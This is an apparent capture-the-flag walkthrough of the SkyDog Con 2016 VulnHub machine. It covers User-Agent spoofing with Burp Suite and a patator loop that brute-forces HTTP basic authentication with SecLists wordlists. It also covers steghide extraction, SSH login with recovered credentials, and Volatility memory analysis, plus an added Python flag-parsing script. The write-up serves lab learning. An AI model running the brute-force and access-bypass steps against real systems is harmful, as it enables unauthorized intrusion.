(!) WARNING: Directory IS LISTABLE. No need to scan it.                      
    (Use mode '-w' if you want to scan it anyway)
                                                                             
-----------------
END_TIME: Fri Aug 18 14:31:33 2017
DOWNLOADED: 20458 - FOUND: 7

Got directories

DIRBUSTER:



2. Flag #2 Obscurity or Security?

I already did the nmap before and we already got 3 ports: http, https, ssh
So what does that 2nd flag mean now? Is it pointing to SSH?

Let's connect to SSH

ssh 192.168.56.129 -p 22222

The authenticity of host '[192.168.56.129]:22222 ([192.168.56.129]:22222)' can't be established.
ECDSA key fingerprint is SHA256:DeCMZ74o5wesBHFLyaVY7UTCA7mW+bx6WroHm6AgMqU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.56.129]:22222' (ECDSA) to the list of known hosts.
###############################################################
#                         WARNING                             #
# FBI - Authorized access only!                 #
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
# Flag{53c82eba31f6d416f331de9162ebe997}      #
###############################################################
root@192.168.56.129's password:

OK, so we got our 2nd flag

Flag{53c82eba31f6d416f331de9162ebe997}

after decoding ---> encrypt


3. Flag #3 Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic.


So it's talking about intercepting traffic, and from the 2nd flag we got the clue "encrypt"
So all this is telling us about SSL

Now there are many ways to see the security certificate

One: Using Wireshark
Two: Using HTTPS
Three: Using commands like sslyze, sslscan etc.

I preferred Option TWO, HTTPS

so when I used ->

https://192.168.56.129
I checked the security certificate and I got this



So we got our 3rd FLAG -->

flag3{f82366a9ddc064585d54e3f78bde3221}

which after decoding -> personnel


Flag #4 A Good Agent is Hard to Find


When I opened the "personnel" directory I got

192.168.56.129/personnel

“ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation.” 

FBI Workstation and ACCESS DENIED, hmm, OK

Let's see what instruction Flag 4 is giving us? USER-AGENT
Does that mean we have to change the user agent? YES, but which user agent? I tried some random user-agents using a user-agent switcher but failed every time

For those who don't know about USER-AGENT:

"USER-AGENT identifies your browser and provides certain system details to servers hosting the websites you visit."

"The User-Agent request header contains a characteristic string that allows the network protocol peers to identify the application type, operating system, software vendor or software version of the requesting software user agent"

OK, now I was stuck here a lot and had no clue which User-Agent to use

I then took help from other writeups and got the hint of the JS FILE, remember, found from the comments in the very first section?

I then used the dirtymarkup website so that I could read the JS file clearly. Another option is the jsbeautify website
Just Google it

So using dirtymarkup I read the JS file and checked the comments /*

I got this

 /* maindev -  6/7/02 Adding temporary support for IE4 FBI Workstations */
/* newmaindev -  5/22/16 Last maindev was and idoit and IE4 is still Gold image -@Support doug.perterson@fbi.gov */


Two things I noted in my KeepNote now ->
1. IE4 FBI Workstation
2. doug.peterson@fbi.gov

Now I got to know about the User-Agent -> IE4 will be used

Then I used BURPSUITE to change the User-Agent


In the screenshot I forgot to check Regex Match so my result did not come as hoped

So don't forget to check Regex Match

Then I intercepted the request/response and got access to 192.168.56.129/personnel

Which is the FBI Portal Page


That FBI Portal welcomes us with "Welcome Agent Hanratty"
I noted this in my KeepNote

At the bottom of the portal we find our fourth flag{14e10d570047667f904261e6d08f520f} 
and a new clue “Clue = new+flag”.

flag{14e10d570047667f904261e6d08f520f} 

after decoding ->   “evidence”
So, we got our 4th flag :D


Flag #5 The Devil is in the Details - Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices

That instruction is telling us about guessable, personal, meaning we have to find out a username and password

Remember the clue? Which is new + flag

That means -> new+evidence -> newevidence

I thought that is a directory

192.168.56.129/personnel/newevidence

This shows a 404 Not Found error

Then

192.168.56.129/newevidence

Works fine, but when I visit the website an "Authentication Required" prompt pops up


So we have to bypass this authentication, or you could say we need a username and password

Remember agent hanratty welcomed us?

I Googled this

https://www.google.co.in/search?q=agent+hanratty&sourceid=chrome&ie=UTF-8

I checked this result ->

www.historyvshollywood.com/reelfaces/catchmeifyoucan.php

The real Carl Hanratty is a composite of a number of FBI agents who worked to catch Abagnale, most notably FBI Agent Joseph ...................

so I got the name "carl hanratty"

Now most important is how to use it, and what is the password?

For the username I recall my note -> doug.peterson@fbi.gov

so the username would be in this format --->  carl.hanratty

OK, I saved this as the user.txt file

Now what about the password?

First I will show you my way, "Burpsuite Brute Forcing", in which I failed, but then for this I saw other solutions and got a very good result, and of course I learned it :D

First BURPSUITE










The difference between the last two images above is in URL-encode ===> in the first image you will see the " = " equals character and in the second image you will see there is no equals sign

OK, now let's start the attack, but we got nothing as a result
Just 401 status, and I was looking for a 301 status

OK, maybe I used too few wordlists

Never mind

Now I saw other solutions for this purpose and found these

First I learned to use PATATOR, which is a command line tool to brute-force for such purposes. Google it to know more

for item in $(find /usr/share/SecLists/ -name "*\.txt"); do sudo patator http_fuzz url=http://192.168.56.129/newevidence auth_type=basic accept_cookie=1 follow=1 -x ignore:code=401 header='User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)' user_pass="FILE0:FILE1" 0=/home/user.txt 1=$item; done

user.txt ->  carl.hanratty

Now I got the result ->

INFO - 200  1465:676       0.081 | carl.hanratty:Grace                |  3158 | HTTP/1.1 200 OK

Awesome, we got the password -> Grace

Let's try this
and really it worked and we got into the directory ->

192.168.56.129/newevidence

NOTE: Don't close Burpsuite yet, as we still have the User-Agent rule there; if we close Burpsuite now then we will be in that directory but can't access the other things which are in that directory



OK, now after examining this directory I got this

Evidence.txt

After opening this link ->

flag{117c240d49f54096413dd64280399ea9}

which after decoding -> panam

Now what's that "panam" and where will it be used?

Never mind, I got the 5th flag, now let's move further



 Flag #6 Where in the World is Frank?

In the same directory I also found two other files: "image.jpg" and "Invoice.pdf"

I downloaded both files, and now it is time for steganography and forensics tools
such as exiftool, pdf-parser, steghide, binwalk and volatility.

I examined the invoice PDF first:

pdf-parser Invoice.pdf

But nothing important was in it.

The image file looked more interesting.

First exiftool on the image file:

exiftool image.jpg

exiftool also gave nothing.


So I used another tool I know, steghide:

steghide info image.jpg
RESULT ->
"image.jpg":
  format: jpeg
  capacity: 230.1 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!

What could the passphrase be? Then I recalled the hint from the previous flag, "panam". I used it and it really worked:

steghide info image.jpg
 
RESULT ->
"image.jpg":
  format: jpeg
  capacity: 230.1 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
  embedded file "flag.txt":
    size: 71.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

We got flag.txt, WOW

Now let's extract that file:

steghide extract -sf image.jpg
Enter passphrase:
wrote extracted data to "flag.txt".

Then we read the file:

cat flag.txt

And we got the FLAG in that txt file:

flag{d1e5146b171928731385eb7ea38c37b8}=ILoveFrance
clue=iheartbrenda

So the flag's MD5 cracks to ILoveFrance, and the file also hands us a clue, iheartbrenda. That is our 6th flag.


Flag#7 – “Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!”

OK, so from the 6th flag we got the decoded text "ILoveFrance" and the clue "iheartbrenda".

Where will they be used?

Well, leave that for now and focus on the 7th flag's instructions.

Hey, "I'm The Fastest Man Alive!": I heard that plenty of times while watching the Flash TV series,
so it's Barry Allen.

So where is it used, and what is the connection with iheartbrenda? Got it, and I know about Brenda too.

So let's try it over SSH (SSH is on port 22222 on this box).

SSH LOGIN AS barryallen

ssh barryallen@192.168.56.129 -p22222

I got this:

###############################################################
#                         WARNING                             #
# FBI - Authorized access only!                               #
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
# Flag{53c82eba31f6d416f331de9162ebe997}                      #
###############################################################
barryallen@192.168.56.129's password:
Permission denied, please try again.
barryallen@192.168.56.129's password:   (typed: iheartbrenda)
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-38-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

14 packages can be updated.
7 updates are security updates.


barryallen@skydogconctf2016:~$


Now it's time for more enumeration, to dig up information about the system and of course the flag. Note that the pre-authentication SSH banner above already leaks one: Flag{53c82eba31f6d416f331de9162ebe997}.

FIRST ->

barryallen@skydogconctf2016:~$ ls
flag.txt  security-system.data

barryallen@skydogconctf2016:~$ cat flag.txt
flag{bd2f6a1d5242c962a05619c56fa47ba6}

which after cracking the MD5 gives: theflash

So we got our 7th FLAG.

Did you notice the security-system.data file?

Let's examine it.

It is a zip file, so rename it and unpack it (unzip adds the .zip extension itself if you leave it off):

mv security-system.data security-system.data.zip

unzip security-system.data

Running file on the extracted security-system.data:

file security-system.data

just says "data" again.

Hmm, OK, leave it for now and focus on the 8th FLAG.

Flag#8 – “Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!”

Find the code to unlock the door, hmm, interesting. Maybe the code is stored somewhere, perhaps in the file we unzipped before.

Let's examine it more.

Time for the steganography tools exiftool and binwalk, but neither gave a result.

At this point I was stuck again and checked a solution.

That is how I learned about the FORENSICS tool VOLATILITY.

Before using it I ran "man volatility" to learn about it:

man volatility
volatility - advanced memory forensics framework
volatility [option]
volatility -f [image] --profile=[profile] [plugin]

The Volatility Framework is a completely open collection of tools for the extraction of digital artifacts from volatile memory (RAM) samples. It is useful in forensics analysis.
The extraction techniques are performed completely independent of the system being investigated but offer unprecedented visibility into the runtime state of the system.


OK, now let's use the tool with what the man page tells us.
But before that I first downloaded the file to my machine. How? With scp:

TO DOWNLOAD A FILE FROM the remote machine to ours ->
scp -P 22222 barryallen@192.168.56.129:~/security-system.data ./

So security-system.data is a memory image, which is why file could only call it "data". Now run volatility. Normally the first step is "volatility -f security-system.data imageinfo" to pick a --profile; it works here without one because Volatility 2's default profile, WinXPSP2x86, matches this Windows XP image (the process list below is a plain XP box: csrss, winlogon, wscntfy, alg, ctfmon):

volatility -f security-system.data pslist

Volatility Foundation Volatility Framework 2.6
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                        
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x867c6830 System                    4      0     57      171 ------      0                                                            
0x86262900 smss.exe                332      4      3       19 ------      0 2016-10-10 21:59:14 UTC+0000                              
0x8623b978 csrss.exe               560    332     10      423      0      0 2016-10-10 21:59:14 UTC+0000                              
0x865ed020 winlogon.exe            588    332     24      512      0      0 2016-10-10 21:59:14 UTC+0000                              
0x8662d808 services.exe            664    588     15      263      0      0 2016-10-10 21:59:14 UTC+0000                              
0x866a5670 lsass.exe               676    588     25      356      0      0 2016-10-10 21:59:14 UTC+0000                              
0x86358a70 vmacthlp.exe            848    664      1       25      0      0 2016-10-10 21:59:14 UTC+0000                              
0x86651da0 svchost.exe             860    664     21      202      0      0 2016-10-10 21:59:14 UTC+0000                              
0x865c2790 svchost.exe             944    664     11      258      0      0 2016-10-10 21:59:14 UTC+0000                              
0x86554020 svchost.exe            1040    664     82     1287      0      0 2016-10-10 21:59:14 UTC+0000                              
0x866196b8 svchost.exe            1092    664      5       59      0      0 2016-10-10 21:59:14 UTC+0000                              
0x8643ca18 svchost.exe            1144    664     17      213      0      0 2016-10-10 21:59:15 UTC+0000                              
0x866fca88 explorer.exe           1540   1520     14      417      0      0 2016-10-10 21:59:16 UTC+0000                              
0x8656b4d0 spoolsv.exe            1636    664     15      125      0      0 2016-10-10 21:59:16 UTC+0000                              
0x86338640 VGAuthService.e        1900    664      2       60      0      0 2016-10-10 21:59:25 UTC+0000                              
0x8667bda0 vmtoolsd.exe           2012    664      9      271      0      0 2016-10-10 21:59:28 UTC+0000                              
0x864f6440 wmiprvse.exe            488    860     14      251      0      0 2016-10-10 21:59:28 UTC+0000                              
0x864fbad0 wscntfy.exe             536   1040      1       31      0      0 2016-10-10 21:59:28 UTC+0000                              
0x85e5dd48 alg.exe                 624    664      8      110      0      0 2016-10-10 21:59:28 UTC+0000                              
0x866f98b0 vmtoolsd.exe           1352   1540      7      242      0      0 2016-10-10 21:59:29 UTC+0000                              
0x86674410 ctfmon.exe             1356   1540      1       79      0      0 2016-10-10 21:59:29 UTC+0000                              
0x865bea48 CCleaner.exe           1388   1540      5      108      0      0 2016-10-10 21:59:29 UTC+0000                              
0x865c3d78 cmd.exe                1336   1540      1       30      0      0 2016-10-10 22:00:05 UTC+0000                              
0x8634fbb8 wuauclt.exe            1884   1040      9      198      0      0 2016-10-10 22:00:13 UTC+0000                              
0x86260a78 wuauclt.exe            1024   1040      6      172      0      0 2016-10-10 22:00:29 UTC+0000                              
0x8667b488 notepad.exe             268   1540      1       55      0      0 2016-10-10 22:00:41 UTC+0000                              
0x8640cc10 cmd.exe                1276   2012      0 --------      0      0 2016-10-10 22:00:49 UTC+0000   2016-10-10 22:00:50 UTC+0000



Let's look more closely at notepad.exe:

volatility -f security-system.data pslist | grep notepad

Volatility Foundation Volatility Framework 2.6
0x8667b488 notepad.exe             268   1540      1       55      0      0 2016-10-10 22:00:41 UTC+0000

Let's get more detail about notepad.exe, starting with its command line:

volatility -f security-system.data cmdline --pid 268

Volatility Foundation Volatility Framework 2.6
************************************************************************
notepad.exe pid:    268
Command line : "C:\WINDOWS\system32\NOTEPAD.EXE" C:\Documents and Settings\test\Desktop\code.txt

So notepad had C:\Documents and Settings\test\Desktop\code.txt open, which is exactly the "code" the flag hint talks about. Now let's dump the text notepad was holding:

volatility -f security-system.data notepad

Volatility Foundation Volatility Framework 2.6
Process: 268
Text:?
Text:d
Text:
Text:?
Text:66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d 

Now we have something:

66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d

Read as ASCII bytes (66 = "f", 6c = "l", 61 = "a", 67 = "g", 7b = "{" ...) this becomes:
flag{841dd3db29b0fbbd89c7b5be768cdc81}

After cracking the MD5: Twolittlemice

Finally we got our 8th flag.
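An added example, not from the original post, of recovering the flag from the Volatility output above. It shows two paths: parsing the notepad plugin's "Text:" lines (the dump above is space-separated hex, which is what code.txt contained), and scanning the raw image bytes for flag{...} in ASCII, in UTF-16LE (how Windows keeps text in memory, which a plain `strings | grep flag` misses) and in hex-encoded ASCII. The hex line is copied from the walkthrough; the sample memory bytes are constructed.

```python
"""Recover flag{md5} from Volatility notepad output or from a raw memory dump.

Added example, not code from the original post. The sample bytes in
__main__ are constructed; only the hex line is from the walkthrough.
"""
import re

HEX_BYTE_RUN = re.compile(r"(?:[0-9a-fA-F]{2}\s+){4,}[0-9a-fA-F]{2}")   # 5+ hex bytes
FLAG_ASCII = re.compile(rb"[Ff]lag\{[0-9a-fA-F]{32}\}")
# Same pattern with a NUL after every character: UTF-16LE as Windows stores it.
FLAG_UTF16LE = re.compile(rb"[Ff]\x00l\x00a\x00g\x00\{\x00(?:[0-9a-fA-F]\x00){32}\}\x00")
HEX_BYTE_RUN_BYTES = re.compile(rb"(?:[0-9a-fA-F]{2}[ \t]){4,}[0-9a-fA-F]{2}")


def decode_hex_run(run):
    """'66 6c 61 67' -> 'flag'; undecodable bytes are replaced, not dropped."""
    return bytes.fromhex("".join(run.split())).decode("utf-8", errors="replace")


def flags_from_notepad_output(output):
    """Parse Volatility 2 `notepad` plugin output: each 'Text:' payload is
    checked for a hex-byte run, decoded, and searched for flag{md5}."""
    found = []
    for line in output.splitlines():
        _, sep, payload = line.partition("Text:")
        if not sep:
            continue
        for run in HEX_BYTE_RUN.findall(payload):
            decoded = decode_hex_run(run).encode()
            found += [m.decode() for m in FLAG_ASCII.findall(decoded)]
    return found


def scan_dump_for_flags(data):
    """Search raw memory bytes for flags in ASCII, UTF-16LE and hex-text form.
    Returns de-duplicated (encoding, flag) pairs in order of first offset."""
    hits = []
    for m in FLAG_ASCII.finditer(data):
        hits.append((m.start(), "ascii", m.group().decode()))
    for m in FLAG_UTF16LE.finditer(data):
        hits.append((m.start(), "utf-16le", m.group().decode("utf-16-le")))
    for m in HEX_BYTE_RUN_BYTES.finditer(data):
        decoded = decode_hex_run(m.group().decode("ascii")).encode()
        for flag in FLAG_ASCII.findall(decoded):
            hits.append((m.start(), "hex-text", flag.decode()))
    seen, ordered = set(), []
    for _, enc, flag in sorted(hits):
        if (enc, flag) not in seen:
            seen.add((enc, flag))
            ordered.append((enc, flag))
    return ordered


if __name__ == "__main__":
    page_hex = ("66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 "
                "38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d")
    notepad_out = "Volatility Foundation Volatility Framework 2.6\nProcess: 268\n" \
                  "Text:?\nText:d\nText:\nText:?\nText:" + page_hex + " \n"
    print(flags_from_notepad_output(notepad_out))
    # Constructed stand-in for a few bytes of a memory image.
    blob = (b"\x00" * 16
            + "flag{841dd3db29b0fbbd89c7b5be768cdc81}".encode("utf-16-le")
            + b"\x00" * 8 + page_hex.encode() + b"\x00")
    print(scan_dump_for_flags(blob))
```

The raw scan is the fallback when no plugin hands you the text: notepad's buffer, a clipboard, or a console history are all UTF-16LE in a Windows image, so a search that only knows ASCII would have walked straight past this flag.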



So I learned a lot by solving this machine and by reading others' solutions.

I hope readers also learned something from this walkthrough.

Thanks to @jamesbower for making such an awesome machine, to vulnhub for hosting such machines for us, and to everyone who writes solutions for these machines so that we all learn.

Thanks again 💗